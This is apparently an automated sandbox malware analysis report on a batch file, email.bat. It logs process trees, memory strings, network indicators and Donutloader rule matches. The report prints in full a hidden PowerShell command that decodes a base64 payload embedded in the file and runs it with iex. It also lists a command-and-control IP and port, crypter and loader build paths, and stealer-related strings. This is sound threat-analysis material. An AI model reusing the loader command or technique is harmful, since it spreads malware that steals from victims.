              Source: Process startedAuthor: Joe Security: Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", ProcessId: 2720, ProcessName: csc.exe
              No Suricata rule has matched


              AV Detection

Source: email.bat | Virustotal: Detection: 11%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbhP source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 0000000A.00000002.2229017631.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2508310620.00000000069F0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Startup\Startup\obj\x64\Release\Startup.pdb source: explorer.exe, 00000006.00000002.2940202775.0000000010881000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbH source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdb source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdbhP source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\zozwmnym.pdb& source: powershell.exe, 00000012.00000002.2273172978.0000026228BF3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

              Networking

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: global traffic TCP traffic: 192.168.2.4:49734 -> 213.209.150.200:9874
              Source: unknown DNS traffic detected: query: 34.26.8.0.in-addr.arpa replaycode: Name error (3)
              Source: unknown TCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: global traffic DNS traffic detected: DNS query: 34.26.8.0.in-addr.arpa
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: PING.EXE, 0000000A.00000003.2058733611.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.
              Source: PING.EXE, 0000000A.00000003.2058733611.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft./fw
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
              Source: explorer.exe, 00000006.00000002.2925943311.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2926818272.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1732389205.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC15421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B4619C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1992910476.0000026210A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076527414.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: powershell.exe, 00000012.00000002.2278789972.0000026228DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: explorer.exe, 00000006.00000000.1734959989.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933549368.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC15421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B461989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B46199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1992910476.0000026210A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000006.00000002.2920165193.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000006.00000000.1731694645.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2927964458.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Azure/azure-storage-cpp)
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076361864.0000000007705000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/cpprestsdk)
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000006121000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076527414.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/open-source-parsers/jsoncpp.git)
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: C:\Windows\SysWOW64\PING.EXE | Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000002.2919882763.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000012.00000002.1992910476.0000026210CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000A.00000002.2192754630.0000000003120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000002.00000002.1839501596.000001DC171B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
